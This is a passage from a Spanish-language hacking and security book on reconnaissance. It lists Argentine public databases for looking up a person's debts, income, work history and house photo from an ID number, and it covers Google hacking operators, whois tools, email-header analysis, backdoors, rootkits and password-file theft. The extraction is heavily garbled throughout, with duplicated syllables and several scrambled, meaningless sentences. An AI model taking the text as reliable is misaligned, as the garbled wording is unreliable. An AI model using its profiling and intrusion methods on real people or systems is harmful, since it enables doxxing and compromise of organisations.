ca para para lograr lograr-los.

Las agencias de seguridad tienen portales de búsqueda de datos, y algunos de estos organismos no poseen el acceso tan público. Intranets y extranets, o todo aquel  espacio para la consulta de datos sea o no privado, son muy tentadores para los intrusos. Base.

Consul Con sultta

URL

Histo His torial rial labo laborral

www.an w.anses ses.go .gov.a v.ar/au r/auto topis pista ta/Serv /Serv_pu _publi blicos cos/his /histo toria.htm ria.htm

Deudas, crédi Deudas, crédittos www.bcra cra.go .gov.ar v.ar/cen /cenries ries/cr010000.as /cr010000.asp?e p?error=0 rror=0 y tar je  jetas tas Ingre In gresos sos decla declara rados dos a la AFIP https://se https ://seti.a ti.afip fip.go .gov.ar v.ar/pa /padron-puc-cons dron-puc-constan tancia-in cia-inter ternet net/Con /Consul sultaCons taConstan tanciaAc ciaAction tion.do .do Obra social social que posee posee www.an ww w.anses ses.go .gov.a v.ar/au r/auto topis pista ta/Serv /Serv_pu _publi blico cos/ooss.htm s/ooss.htm Infrac In fraccio ciones nes de tránsi tránsitto www.bue .bueno nosai saires res.go .gov.a v.ar/a r/areas reas/se /segu guri ridad dad_jus _justi ticia cia/jus /justi ticia cia_tra _tra bajo/adm_falta/?menu_id=5743 Foto Fo to de la facha fachada da www.mapa www.ma pa.bue .bueno nosai saires res.go .gov.ar v.ar/si /sig/in g/index.phtml dex.phtml de su casa casa Bases Online.

En algu algunas nas bases bases de datos datos públi públicas, cas, se puede puede

encontrar encon trar infor informa mación ción acerca acerca de alguien alguien con sólo sólo tener tener el núme número ro de docu documen mento, to, que se consi consigue gue fácil fácilmen mente te en el padrón padrón nacio nacional. nal.

50

 

Una reco recolec lección ción (mucho (mucho menos menos pasi pasi va)  va) de infor informa mación ción liga ligada da a bases bases de datos datos por parte par te de los intru intrusos sos es aquella aquella que resul resulta ta intru intrusi si va.  va. Veamos Veamos cómo cómo pueden pueden lograr lograr esto: es to: el intru intruso so progra programa ma o utili utiliza za un massroo massrooter ter (mezcla (mezcla de escá escáner ner con exploit exploit reremoto mo to 0day que permi permite te meter meterse se dentro dentro de los ser vido  vidores res o extraer extraer datos datos secuen secuencial cial-mente men te a muy alta alta velo veloci cidad), dad), barrien barriendo do los rangos rangos de direc direccio ciones nes IP. Estos Estos datos datos son acumu acumula lados dos (colec (coleccio ciona nados) dos) para para utili utilizar zar en un futu futuro ro o bien apro ve  vechan chando do la intru in trusión. sión. Sea de paso, tambien pueden insta ins talar lar algunas de las siguien siguientes tes cosas: cosas:

Backdoors on-the-fly: Los backdoors • Backdoors backdoors son puertas puertas trase traseras ras para para vol ver  ver a in ingre gre-sar cuando cuando así lo deseen, deseen, sin desper despertar tar sospe sospechas chas (en el caso caso de los on-the-fly), ya que no dejan dejan un puerto puerto abierto abierto o algo algo remo remota tamen mente te detec detecta table ble como como para para saber saber que existe. existe. Más infor informa mación ción acerca acerca de esta esta avanza avanzada da técni técnica, ca, en www.hac www.hacker kerz.ir/ z.ir/ e-books/i e-book s/init_r nit_rpi.txt pi.txt (deta (detalla lla cómo cómo patchear patchear el kernel kernel OTF). • Bi Bina narios rios tro ya  yani niza zados dos: El intru intruso so con cono conoci cimien mientos tos suficientes suele suele reempla reempla-zar a mano mano algunos archi archi vos  vos bina binarios rios de siste sistema ma (por ejemplo ejemplo ps, lsof o ls en LiLinux) para para ocultar ocultar proce procesos sos o archi archi vos  vos dentro dentro del siste sistema ma opera operatiti vo.  vo. Cuando Cuando utiutililice ce éstos, éstos, el admi adminis nistra trador dor del sistema no se dará da rá cuenta cuenta tan fácil fácilmen mente te de que hay proce procesos sos y archi archi vos  vos nue vos en su ser vidor.  vidor. Rootkits kits: Éste • Root Éste es un kit o una serie se rie de aplica aplicacio ciones nes que se utiliza para para mante mantener ner los pri vile  vilegios gios de root dentro dentro del ser vidor,  vidor, que no se insta instala la en forma forma tan arte artesa sa-nal y sir ve  ve para para mante mantener ner proce procesos sos ocultos ocultos y, tal vez, una puerta puerta de entra entrada. da. Los hay para para todos todos los siste sistemas mas opera operatiti vos.  vos. Sniffers fers: Se trata de captu • Snif captura rado dores res de logins logins o de cualquier cualquier clase clase de paque paquete. te. En el capítulo 8 hay ejemplos de cada uno.

Los archi archi vos  vos más reco recolec lecta tados dos por esta esta técni técnica ca intru intrusi si va  va son los sha shadows dows de los ser vido  vidores res Linux Linux y Sola Solaris, ris, los SAM de los ser vido  vidores res Windows Windows de la fami familia lia SerSer ver o ter termi mina nales les XP (ambos (ambos poseen poseen las cuentas cuentas de siste sistema ma y sus pass words de modo mo do cifra cifrado). do). También También se pueden pueden compro comprome meter ter direc directa tamen mente te median mediante te descui descui-dos de admi adminis nistra tración ción y no por fallas fallas en soft ware,  ware, como como por ejemplo, ejemplo, la famo famosa sa cuenta cuen ta SQL de nombre nombre sa, sin cla ve asigna asignada. da.

Script kiddie Un script-kiddi script-kiddiee no só sólo lo barre barre (esca (escanea nea buscan buscando do o ejecu ejecuta ta exploits exploits al azar) los rangos rangos de di direc ciones nes IP. de Éstos, Éstos, ex extrae ránfallas inllas forma mación de carde carpe petas tas com compar parti tidas das inciles tranet tranets netsy sinreccio res restric tricción ción acceso acce sotraerán o con fainfor deción inyección inyec ción código códi go SQL, muyofáci fáintra lesnets/ex des/extra detectar detec tar de utili utilizar zar para para compro comprome meter ter servi servido dores res de empresas u otras orga organi niza zacio ciones. nes.

51

 

 Así, qui quizás, zás, el admi adminis nistra trador dor tu vo desac desactua tualiliza zado do un día de fin de sema semana na su ser vidor,  vidor, pero pe ro éste éste ya fue compro comprome meti tido do casi casi sin rastros. rastros. En el futu futuro, ro, si ese ser vidor  vidor perte pertene ne-ce a una orga organi niza zación ción a la que debe debe compro comprome meter, ter, el intru intruso so sólo sólo debe deberá rá buscar buscar uno

de esos archi archi vos  vos extraí extraídos dos pre via  viamen mente, te, romper romper el cifra cifrado do de la cuenta cuenta de siste sistema ma (y   ver el resto resto de sus datos datos si los tiene) tiene) para para así ahorrar ahorrarse se mucho mucho tiempo. tiempo. Es muy proprobable ba ble que un login login/pass /pass sea coinci coinciden dente te en un ser vidor  vidor de otro tramo tramo de red en la empre em presa sa o que, al menos, menos, sir van  van sus sus usua usuarios rios de siste sistema. ma. Muchas Muchas empre empresas sas nunca nunca sasaben cómo cómo fueron fueron compro comprome meti tidas das supues supuesta tamen mente te hoy, pero pero el caso caso es que lo fueron fueron inicial ini cialmen mente te hace hace mucho mucho tiempo tiempo (por ésta ésta o por otras técni técnicas cas más avanza avanzadas). das).

Busca Bus cado dores res Los busca buscado dores res son una increí increíble ble fuente fuente de clasi clasifi fica cación, ción, análi análisis, sis, búsque búsqueda da y caché caché de infor informa mación, ción, confi confiden dencial cial o no, sobre sobre un obje objeti ti vo.  vo. Alta Alta vis  vista ta fue el busca buscador dor prepreferi fe rido do en los años 90, Yahoo Yahoo lo fue más cerca cerca del año 2000 y hoy lo es el exce ex celen len-te Google. Google. Segu Segura ramen mente te habre habremos mos escu escucha chado do hablar hablar de Goo decir, Google gle hacking hacking, es decir, utililizar uti zar el famo famoso so busca buscador dor para para encon encontrar trar datos datos rele rele van  vantes tes del obje objeti ti vo.  vo.

Google. De Deta talles lles de una búsque búsqueda da en Google Google rela relacio ciona nada da

con archi archivos vos que contie contienen nen passwords passwords en tablas tablas SQL.

Entonces, veamos veamos ahora ahora una lista lista bastan bastante te comple completa ta de búsque búsquedas das deter determi mina nadas das que se pueden hacer para para encon encontrar trar infor informa mación ción liga ligada da a intru intrusio siones: nes: archi archi vos  vos con infor in forma mación ción sensi sensible, ble, confi configu gura racio ciones, nes, bases bases de datos, datos, deta detalles lles de vulne vulnera rabi bililida dades, des, 52

 

avisos, usuarios, avisos, usuarios, entra entradas das de logueo, logueo, logins, logins, direc directo torios rios pri vados,  vados, errores errores típi típicos cos de un siste sistema ma opera operati ti vo  vo o aplica aplicación ción en espe especial, cial, etcé etcéte tera. ra. Google gle Hack Honey Honey pot (http://ghh Por su parte, parte, el proyec proyecto to Goo (http://ghh.sour .source cefor forge ge.net) .net) mere me rece ce espe especial cial atención. atención.

Google Hack Honey Google Honeypot pot es un proyec proyecto to para para estu estudiar diar y anali analizar zar a script-kiddies script-kiddies que utili utilizan zan Google Google para para buscar buscar deter de termi mina nados dos pará paráme metros tros (de orga organi niza zacio ciones nes al azar) en el busca buscador. dor. GHH.

Se deno denomi mina na Honey Honeypot pot al sistema (tipo carnada) cuya cuya inten intención ción es atraer a intrusos simu si mulan lando do ser siste sistemas mas vulne vulnera rables bles o débi débiles les a los ataques. ataques. Es una herra herramien mienta ta de segu se guri ridad dad infor informá máti tica ca usada usada para para reco recoger ger infor informa mación ción sobre sobre los atacan atacantes tes y sus téctécnicas. ni cas. Los Honey Honeypots pots pueden pueden distraer distraer a los atacan atacantes tes y ad ver  vertir tir al admi adminis nistra trador dor del siste sis tema ma de un ataque, ataque, además además de permi permitir tir un examen examen en profun profundi didad dad del atacan atacante, te,

Lect Le ctu ura re reco come men nda dad da

No es posi posible ble de jar de re reco comen mendar dar el exce excelen lente te libro libro Google Google Hacking Hacking for Pene Penetra tration tion Testers, Tes ters, Volu Volume me 2, de Johnny Long. En esta esta obra, pode podemos mos encon encontrar trar todos todos los méto méto-dos y combi combina nacio ciones nes de búsque búsqueda da posi posibles. bles. Por otra parte, parte, en http://johnn http://johnny.i y.ihacks hackstuff tuff-.com/ghdb.php, se puede puede encon encontrar trar la cono conoci cida da Google Google Hacking Hacking Data Databa base. se.

53

 

du duran rante te y después después del ataque. ataque. La gente gente de Google Google no es tonta tonta y lo más proba probable ble es que cuando cuando un atacan atacante, te, buscan buscando do obje objeti ti vos  vos al azar, co colo loque que algu algunos nos de los méto méto-dos descri descritos tos en la GHDB (Google (Google Hack Data Databa base) se) sea redi redirec reccio ciona nado do hacia hacia algu algu-na honey honeypot pot o a una mayo mayoría ría de links con resul resulta tados dos 404 y a más honey honeypots. pots. Esto Esto permi per mite te contro controlar lar los ataques ataques indis indiscri crimi mina nados dos de script-kiddies, script-kiddies, pero pero no así el ataata que a orga organi niza zacio ciones nes de modo modo foca focaliliza zado. do. La típi típica ca búsque búsqueda da inicial inicial de un obje objeti ti vo  vo deter determi mina nado do será será enton entonces: ces: si site te:si :sitio tio vic  vic-tima ti ma.com .com. A sitio sitio vic  victi tima ma.com, .com, lo ante antece cede de el opera operador dor avanza avanzado do site:, site:, que dará dará cocomo resul resulta tado do una lista lista de subdo subdomi minios nios rela relacio ciona nados dos o todas todas sus posi posibles bles seccio secciones, nes, inclu in cluso, so, links. A partir partir de allí, el intru intruso so o el profe profesio sional nal comen comenza zarán rán a in ves  vesti tigar gar todos to dos sus URLs, caché, caché, sus fuentes, fuentes, sus datos, datos, aplica aplicacio ciones nes y tecno tecnolo logías. gías. También También como co mo en la búsque búsqueda da de un e-mail, es reco recomen menda dable ble utili utilizar zar la siguien siguiente te sinta sintaxis: xis: • • • • •

@dominio @domi nio vic  victi tima ma.com .com: sólo sólo el domi dominio nio para para ver más usuarios. usuarios. usuario usua rio@do @domi minio nio vic  victi tima ma.com .com: e-mail comple completo. to. espacio cio en blanco blanco en el medio. medio. usuario usua rio domi dominio nio vic  victi tima ma.com .com: con un espa usuario usua rio: el usuario usuario solo. solo. usuario usua rio domi dominio niodeal dealgu gunisp nisp: para para encon encontrar trar otras posi posibles bles casi casillas. llas.

La búsque búsqueda da debe debe pasar pasar más por la lógi lógica ca e in ven  venti ti va  va nuestra nues tra (a mano, mano, claro) claro) que por los recur recursos sos auto automa mati tiza zados dos con los que conte contemos mos para para todo todo lo que compren compren-de el chequeo. chequeo. ¿Por qué? Porque Porque tendre tendremos mos infi infini nitas tas posi posibi bililida dades des de combi combina na-ción en compa compara ración ción con las que tendría ten dríamos mos si pusié pusiéra ramos mos una herra herramien mienta ta que lo hicie hiciera ra por noso nosotros. tros. Por otro lado, lado, logra lograre remos mos enten entender der bien cómo cómo se hace hace una in ves  vesti tiga gación ción meti meticu culo losa sa vía busca buscador. dor. Quizás Quizás al princi principio pio lle ve más m ás tiem ti empo, po, pero pe ro a medi medida da que éste éste pasa pasa y se tiene tiene mayor mayor expe experien riencia, cia, los deta detalles lles y datos datos sigsignifi ni fica cati ti vos  vos serán serán más y mejor mejor logra logrados. dos. A conti continua nuación, ción, vemos vemos un lista listado do de opeoperado ra dores res avanza avanzados dos de Google: Google: • site site: busca busca todo todo lo rela relacio ciona nado do al domi dominio. nio. • in inti title tle: sitios sitios rela relacio ciona nados dos al títu título. lo. • allin allinti title tle: sitios sitios de títu títulos los con todas todas las pala palabras bras defi defini nidas. das.

Cuidado con los posts Nunca convie Nunca conviene ne postear postear (publi (publicar) car) direc direccio ciones nes de e-mail, menos menos la de nuestra nuestra empre empre-sa. Convie Conviene ne usar una de Hotmail Hotmail o Gmail. Ade Además, más, no es reco recomen menda dable ble usar nomnombres reales, reales, cargos cargos o deta detalles, lles, sino sino sólo sólo nickna nicknam mes al alea eato torios. rios. Si postea posteamos mos desde desde

nuestra nues tra empre empresa, sa, recor recorde demos mos usar usar un proxy proxy http pa para ra no de jar la direc dirección ción IP real allí.

54

 

• • • •

inurl: presen presente te en el URL. allinurl alli nurl: todo todo presen presente te en el URL. filety fi lety pe: tipo tipo de archi archi vo  vo por bus buscar, car, exten extensión. sión. allintext allin text: todo todo presen presente te en el texto texto por buscar. buscar.

• link : quién linkea linkea a deter determi mina nado do sitio sitio busca buscado. do. • inan inanchor chor: busca busca en el texto texto utili utiliza zado do como como link. • da date teran range ge: busca busca entre entre rangos rangos de fechas. fechas. • ca cache che: busca busca dentro dentro de los sitios sitios cachea cacheados. dos. • in info fo: infor informa mación ción sobre sobre el sitio sitio web busca buscado. do. • re rela lated ted: busca busca simi simila lares. res. • aut author hor: autor autor de mensa mensaje je en Google Google Groups. • group: busca busca perte pertenen nencia cia de grupo grupo en Google Google Groups. •  pho  phone nebook  book : busca busca núme números ros de telé teléfo fono. no. • in insub subject ject: busca busca titu titula lares res de mensa mensajes jes en Google Google Groups. defi fine ne: busca • de busca el signi signifi fica cado do de deter determi mina nado do voca vocablo. blo.

El uso del símbo símbolo lo menos menos (-) para para la exclu exclusión sión de pala palabras bras es muy útil a la hora hora de buscar bus car entre entre mucho mucho mate material; rial; lo mismo mismo pasa pasa con las comi comillas llas (“ ”) en caso ca so de busbuscar una frase frase textual textual o el símbo símbolo lo (+) para para rela relacio cionar. nar.

Goolag. Es Esta ta es la panta pantalla lla de la herra herramien mienta ta Goolag Goolag Scann Scanner para Google, Google,

Búsqued Búsque da avanzada y operadores

La búsque búsqueda da avanza avanzada da de Google Google en espa español ñol está en www.goo www.google gle.co .com/ad m/advan vanced ced-_search?hl=es. _search?h l=es. Opera Operado dores res y cómo cómo usar los servi servicios cios de búsque búsqueda da de Google: Google: www.goo www.goo-gle.co gle .com/in m/intl/es tl/es/fea /featu tures.html, res.html, www.goo www.google gle.co .com/ m/ intl/es intl/es/help /help/ba /basics sics.htm .htmll y www www.goo .google gle-.com/in .co m/intl/es tl/es/hel /help/re p/refi fine nesearch.html. search.html.

55

 

rea reali liza zada da por cDc (cult of the dead cow). Pode Podemos mos ba jar  jarla la de www.goo www.goola lag.org. g.org.

Para evitar Para evitar proble problemas, mas, en nuestros nuestros sitios sitios web con vie  viene ne utili utilizar zar un filtra filtrador dor de robots robots de inde indexa xación, ción, si no desea deseamos mos que Google Google u otro busca buscador dor cacheen cacheen el sitio sitio o parte parte de ellos. Inclu Incluso, so, es reco recomen menda dable ble bloquear bloquear spiders spiders en busca busca de e-mails para para evitar evitar spam. Para Para crear archi archi vos  vos es espe pecia ciales, les, pode podemos mos visi visitar tar ww w.in vi  vision-grap sion-graphics hics-. com/ro com/robotstxt botstxt _gene  _genera rator.html. tor.html. Es impor importan tante te tener tener en cuenta cuenta que, si en el archi archi- vo robots.txt robots.txt decla declara ramos mos direc directo torios rios pri vados  vados o sensi sensibles, bles, un intru intruso so podrá podrá leerlo. leerlo. Hay que saber saber que el busca buscador dor no inde indexa xa todo todo el conte conteni nido do del sitio sitio y que el webwebmaster mas ter o admi adminis nistra trador dor puede puede tomar tomar recau recaudos dos para para que el spider spider inde indexa xador dor no cacachee algu algunos nos paths (direc (directo torios rios o carpe carpetas) tas) del mismo mismo sitio. sitio. De esta esta mane manera, ra, esos paths debe deberán rán ser busca buscados dos luego luego sin el uso del busca buscador. dor.

Podemos Pode mos ver el robot robots.t s.txt xt en un un sitio sitio del gobier gobierno, no, inde indexa xado do por Google, que lista Google, lista direc directo torios rios impor importan tantes. tes. Esto Esto es un descui descuido do de admi adminis nistra tración, ción, Paths.

y su existen existencia cia es una de las prime pri meras ras cosas cosas que un intru intruso so va a buscar buscar en un sitio. sitio.

 Al gunas  Algu nas herra herramien mientas tas auto automa mati tizan zan la búsque búsqueda da a tra vés de Goo Google, gle, como como QGoogle, QGoo gle, GoogleS GoogleScan, can, Google Google Enum o Site Si teDig Digger ger de Foundsto Foundstone. ne. Incon Inconta tables bles scripts en Perl y otras herra herramien mientas tas podrán podrán ser encon encontra tradas das en Secu Security rityfo focus cus o Packets Pac ketstorm torm para para buscar buscar en Google Google usuarios usuarios de siste sistema ma e infor informa mación ción rela relacio cio-nada na da al footprin footprinting ting (Backtrack (Backtrack 2.0 tiene tiene en su colec co lección ción varias varias de éstas). éstas). Pero Pero la búsque búsqueda da y el análi análisis sis manual manual es lo más reco recomen menda dable ble para para hacer hacerlo lo de modo modo profe pro fesio sional nal diri dirigi gido do a un obje objeti ti vo  vo en con concre creto. to. Siempre Siempre hay que re vi  visar sar las cacaché de pági páginas nas en el resul resulta tado do de las búsque búsquedas das porque porque quizás quizás algún algún dato dato histó histó-56

 

ri rico, co, no existen existente te a la fecha, fecha, sea de utili utilidad dad para para un emba embate. te. Al final final del capí capítu tu-lo, vere veremos mos cómo cómo clasi clasifi ficar car esta esta infor informa mación ción encon encontra trada da median mediante te los busca buscado do-res y anali analiza zare remos mos de qué forma forma nos puede puede ser útil.

Otros recur recursos sos onli online ne Hay otras bases bases de datos datos públi públicas cas y herra herramien mientas tas que brinda brindarán rán datos datos en tiemtiempo real en Inter Internet. net. Entre estos estos últi últimos, mos, los sitios si tios más cono conoci cidos dos en el pasa pa sado do fueron fue ron www  www.sams .sams pa  pade.org de.org y www  www.net .netcraft craft.com .com, que permi permitían tían saber saber el siste siste-ma opera operati ti vo  vo de d e los lo s ser se r vi  vido dores, res, sus rangos rangos de direc direccio ciones, nes, qué siste sistema ma tenía tenía hishistóri tó rica camen mente, te, su upti uptime, me, IP, los nombres nombres de admi adminis nistra trado dores, res, telé teléfo fonos nos y direc di rec-ciones físi ciones físicas, cas, entre entre otras cosas. cosas. Como Como ejemplo, ejemplo, veamos veamos qué datos da tos pode podemos mos obobtener te ner en el sitio sitio  ww w.al  w.all-ne l-netttools tools.com/tool .com/toolbox box , que tiene tiene muchas muchas herra herramien mien-tas. Antes Antes de utili uti lizar zarlas, las, con vie  viene ne leer atenta atentamen mente te el mensa mensaje je de ad ver  verten tencia cia (WARNING) (WAR NING) del sitio, sitio, ubica ubicado do al pie de la pági pá gina. na.

SmartWhois: en • SmartWhois: encuen cuentra tra infor informa mación ción acerca acerca de una direc dirección ción IP, hostna hostname, me, inclu inclu-yendo yen do país, pro vin  vincia, cia, ciudad, ciudad, nombre nombre del pro vee  veedor dor de Inter Internet, net, su admi adminis nistra trador. dor. CountryWhois: hois: de vuel ve • CountryW  ve el país de donde donde pro vie  viene ne una direc dirección ción IP.  Trace ceRou Route: te: de vuel ve •  Tra  ve la máqui máquina na y la IP de cada ca da salto salto que da un paque paquete te desde desde la máqui máquina na origi original nal hasta hasta la de desti destino no por Inter Internet. net. Además, también también informa el tiempo en mili tiempo milise segun gundos dos que tarda tarda éste. éste. • Ping: en vía un echo re request quest a una máqui máquina na espe especi cifi fica ca en la red. Esto Esto puede puede ser utililiza uti zado do para para chequear chequear la comu comuni nica cación ción entre entre dos máqui máquinas nas o para para ver si el host espe es pecí cífi fico co está está corrien corriendo do o existe. existe. • Ns NsLoo Lookup: kup: re resuel suel ve  ve un host hostna name me a direc dirección ción IP o vice vice ver  versa. sa.

• Proxy Test: che chequea quea si un Proxy es realmen realmente te anóni anónimo. mo. Este Este trata trata de reco recono nocer cer la verda verdade dera ra direc dirección ción IP inclu incluso so si ésta ésta se encuen encuentra tra detrás detrás de un Proxy httpd. • En vi  viron ronmen mental tal Varia Variables bles Test: mues muestra tra varias varias confi configu gura racio ciones nes remo remotas tas del browser brow ser y de nuestra nuestra máqui máquina. na.

 Más scripts Podemos Pode mos probar probar otros scripts y herra he rramien mientas tas para para obte obtener ner infor informa mación ción en sitios sitios como como http:// http :// member.dnss member.dnsstuff tuff.com .com/pa /pages ges/to /tools ols.ph .php p y http http://tools-on ://tools-on.net .net/net.shtml. /net.shtml. Este Este titipo de herra herramien mientas tas permi permiten, ten, en parte, parte, ubicar ubicar en Inter Internet net a la orga organi niza zación ción ob je  jeti tivo. vo.

57

 

Ping. Los coman comandos dos trace tracerou route te y pin ping g

desde des de la conso consola la de coman comandos dos (shell) de Linux. Linux.

Muchos de los datos Muchos datos obte obteni nidos dos a tra vés de es estas tas pági páginas, nas, también pueden pueden conse conse-guirse guir se direc directa tamen mente te median mediante te la utilización de coman comandos dos de conso consola la en un siste sistema ma opera ope rati ti vo  vo como como Windows, Windows, Linux Linux o Unix.

Tracert. Los coman comandos dos trace tracerrt y pin ping g de dessde

la conso consola la de coman comandos dos (prompt) de Windows. Windows.

58

 

modife Otro modo de cia obtener obte con herramien herra mientas inloterfaz inter gráfica gráfi ca di(achos sistesiste mas. La dido feren rencia ennerlos entre trelos uties utili lizar zar estas estas últimas últi mastas y hacer hadecerlo defazforma onen onli line nedichos través desitios) si tios) es que el intru intruso so hábil hábil difí difícil cilmen mente te lo haga haga desde desde su máqui máquina na (a menos menos que sea a tra vés de un ser vidor  vidor proxy o inter interme media diario) rio) para para no dejar dejar rastros rastros en el obje obje-ti vo  vo de los coman comandos dos ejecu ejecuta tados dos y su búsque búsqueda. da. El intru intruso so inte inteliligen gente te jamás jamás deja dejará rá su direc dirección ción IP real en algún algún log del obje objetiti vo,  vo, a dife diferen rencia cia del profe profesio sional nal ético ético que no ve ningún problema en hacerlo.

Tool. NetS NetScan canTools, Tools, una de las más cono conoci cidas das en Windows. Windows.

En cuanto cuanto a las bases bases de datos datos onli online, ne, son las del tipo tipo domi dominios nios regis registra trados dos y aqueaquellas liga ligadas das a direc direccio ciones nes IP, por ejemplo: ejemplo: www  www.cuw .cuwhois hois.com .com, www  www.rob .robtex tex.com .com,  www.re  www .regis gister ter.com .com y  www  www.lac .lacnic nic.net .net. Éstas Éstas darán darán como como resul resulta tado do de la búsque búsque-da un puña puñado do de datos datos inte intere resan santes tes acerca acerca de la orga organi niza zación, ción, encar encarga gados, dos, nombres nombres y direc direccio ciones nes IP o ser vido  vidores, res, entre entre otras cosas. cosas.  Metodol etodologías de chequeo Si queremos obte obtener ner más infor informa mación ción sobre sobre las meto metodo dolo logías gías de chequeo, chequeo, pode podemos mos visi vi sitar tar las siguien siguientes tes direcciones: www.oiss www.oissg.org, g.org, www.o www.owas wasp.org, p.org, www.i www.ise seco com.in m.info fo-/mirro /mi rror/osstm r/osstmm. m.en en.2 .2.. 1. 1.1. 1.pd pdff y ww www w.vul .vulne nera rabi bilit lityas yassess sessment ment.co.uk .co.uk/Pe /Pene netra tration tion-%20Test.html.

59

 

Net Tool Toolss 5 es una una herra herramien mienta ta win32 que cuenta cuenta con muchas muchas funcio funciones nes útiles útiles desde desde su amiga amigable ble inter interfaz faz gráfi gráfica ca para pa ra reali realizar zar IG. http://u http://users sers.pan .pando dora ra.be/ah .be/ahma madi di /nettools.htm.  /nettools.htm. Tool 2.

Para obte Para obtener ner infor informa mación ción del tipo tipo conte conteni nido do histó históri rico co de sitios, sitios, pode podemos mos visi visitar, tar, por ejemplo, ejemplo, ww w.ar  w.archi chi ve.org  ve.org. Éste Éste nos muestra, muestra, en una línea línea tempo temporal, ral, las dife dife-rentes ren tes pági páginas nas web que tu vo una actual. ac tual. Lo impor importan tante te de esto esto es que muestra muestra vavariacio ria ciones nes de conte conteni nido do en el tiempo tiempo (imagi (imagine nemos mos nombres nombres de contac contactos tos de emplea emplea-dos, cuentas cuentas de e-mail, archi archi vos  vos o di direc recto torios rios sensi sensibles, bles, etcé etcéte tera). ra).

Cabe Ca bece ceras ras de correos correos electró electróni nicos cos Luego de encon Luego encontrar trar un puña puñado do de casi casillas llas de correo correo de la orga organi niza zación ción median mediante te Google Goo gle o bien exami examinan nando do dete deteni nida damen mente te la pági página na web insti institu tucio cional, nal, el intru intruso so trata tra tará rá de ubicar ubicar en la red a la or orga gani niza zación ción median mediante te algo algo de análi análisis sis o inte interac racción. ción. Inte In terac racción ción en caso caso de que no encuen encuentre tre el códi código go de algún algún correo correo electró electróni nico co de ella, ya que de hacer hacerlo, lo, sólo sólo tendría tendría que anali analizar zarlo lo y comen comenzar zar a esca escanear near los puerpuertos y los hosts de sus redes re des luego luego de resol resol ver  ver sus direc di reccio ciones nes IP. Podrá Po drá también también compa comparar rarlos los con la direc dirección ción IP del sitio sitio web de la empresa para para cocorrobo rro borar rar que están están terce terceri rizan zando do el aloja alojamien miento to web (hosting) (hosting) de su pági página na web y  60

 

 ver si ésta és ta no está está aloja alojado do en su propia propia red.  También  Tam bién obrará obrará de modo modo lógi lógico co para para obte obtener ner otros datos datos valio valiosos sos o apro ve  vecha chables. bles. La infor informa mación ción que puede puede dar a un intru intruso so un simple simple correo correo electró electróni nico co es muy   varia  va riada da e impor importan tante. te. Anali Analice cemos mos un ejemplo ejemplo de códi código go fuente fuente de un e-mail. Para Para  verlo,  ver lo, si utili utiliza zamos mos Outlook Outlook Express, Express, debe debemos mos hacer hacer un click con el botón bo tón dere dere-cho sobre sobre el e-mail y allí elegir elegir Propie Propieda dades des/De /Deta talles. lles. Cabe Cabe aclarar aclarar que este este correo correo electró elec tróni nico co es real, pero pero fue míni mínima mamen mente te modi modifi fica cado do para para sal vaguar  vaguardar dar la inte integri gri-dad de la segu seguri ridad dad de la infor informa mación ción de esa orga organi niza zación. ción. Si lo no leemos leemos líel nearecep línea línea deta dete teni nida damen mente, te, overe vepostas remos mos que su traza traza cami ca mino hastalínea hasta repor ceptor tor y lista lis los nodos nodos pos tas que reainformación reali lizó zó el mensaje hasun hasta ta

llegar a nuestro nuestro buzón. buzón. Gene General ralmen mente, te, entre entrega ga datos datos como como los que vemos vemos a conti conti-nuación nua ción (ya sea desde desde el códi código go fuente fuente o su conte conteni nido). do). Código fuente de un correo electrónico

1- An este te dato dato sir ve  ve para para adaptar adaptar algún algún méto método do para para la esca escala lada da de  Anti ti virus:  virus: es privile privi legios gios no detec detecta tado do por ese anti anti virus.  virus. 2- Ser vers de correo: este caso, caso, qmail (http://es (http://es.wi .wiki kipe pedia.org dia.org/wi /wiki/Q ki/Q-co rreo: en este

61

 

mail). 3- Día y hora horario: rio: im impor portan tante te para para ver a qué hora hora traba trabajan jan o en qué fecha fecha resresponden pon den los correos. correos. 4 y 5 Nom Nombres bres de hosts de los SMTP: hay muchos muchos ISP regio regiona nales les y nacio na ciona nales les que poseen poseen fallas fallas y pueden pueden compro comprome meter terse. se. El intru intruso so no duda dudará rá de hacer hacerlo lo si el siste sistema ma de la orga organi niza zación ción es mucho mucho más segu seguro. ro. Recor Recordar dar que el intru intruso so no tiene tiene ética ética y hará hará lo que sea nece nece--

sario sa rio para para inter intercep ceptar tar el flujo flujo de infor informa mación ción del obje objeti ti vo.  vo. 6- ISP:  Arnet  Ar net es te caso. ca insetruso puemación puede deción intentar inten tarlacompro com prome meter ter el ISP o totodo aquel noen nodo doeste por el so. queElpase paintru laso informa infor de organi orga niza zación. ción. 7- Di Direc rección ción IP: de depen pende de de la topo topolo logía gía de red y del ser vi  vicio cio de correo. correo. Los correos co rreos brindan brindan la IP públi pública ca del gate gate way o ser vi  vidor, dor, el cual se puede puede buscar buscar entre en tre los rangos rangos decla declara rados dos en algu alguna na enti entidad dad de regis registro. tro. 8- Nom Nombres bres de termi termina nale less (P (PC) C):: ter termi minal nal y unknown unknown (si, algu algunos nos le ponen ponen nombres nom bres di verti  vertidos dos de ese tipo: tipo: unknown, unknown, HELO, HELO, como como también también los peli peli-grosos: gro sos: conta contadu duría, ría, geren gerencia, cia, recep recepción, ción, etcé etcéte tera). ra). Sir ven  ven para para ubicar ubicarlos los en una red de direc direccio ciones nes de IP diná dinámi micas cas (que cambian cambian día a día, luego luego con un simple simple escá escáner ner la ubica ubicamos mos en hora horario rio comer comercial cial o acorde acorde con el hora horario rio en que nos llellas llegó gó eldee-mail). 9- Ori Origen gen y casi casillas correo: es correo: este te correo correo salió salió de un cliente cliente adsl de Arnet, Arnet, papasó por su SMTP terce terceri riza zado do (Arnet). (Arnet). Su casi casilla lla de correo correo insti institu tucio cional nal está está liligada ga da a un domi dominio nio .com.ar .com.ar regis registra trada da en www.ni www.nic.ar, c.ar, del cual duran durante te mucho mucho tiempo tiem po se han podi podido do extraer extraer los e-mails con el que se regis registra traban ban las perso perso-nas y enti entida dades, des, como como pode podemos mos leer en www.de www.delilito tosin sinfor forma mati ticos cos.com .com/pro /pro-teccion tec cionda datos tos/ca /caso soni nicar.shtml. car.shtml. Cliente te de correo correo y siste sistema ma opera operati ti vo:  vo: Mi 10- Clien Micro crosoft soft Outlook Outlook Express Express verversión 6.00.2900.2869. Windows Windows XP SP2 muy proba probable blemen mente. te. 11- In Infor forma mación ción en el cuer po del mensa men saje: je: aquí pode podemos mos encon encontrar: trar: Nombre de emplea Nombre empleado do que firma firma y cargo, cargo, para para utili utilizar zar luego luego al contac contactar tar con otro o tratar tratar de dilu diluci cidar dar logins logins (usuarios) (usuarios) con el típi típico co forma formato 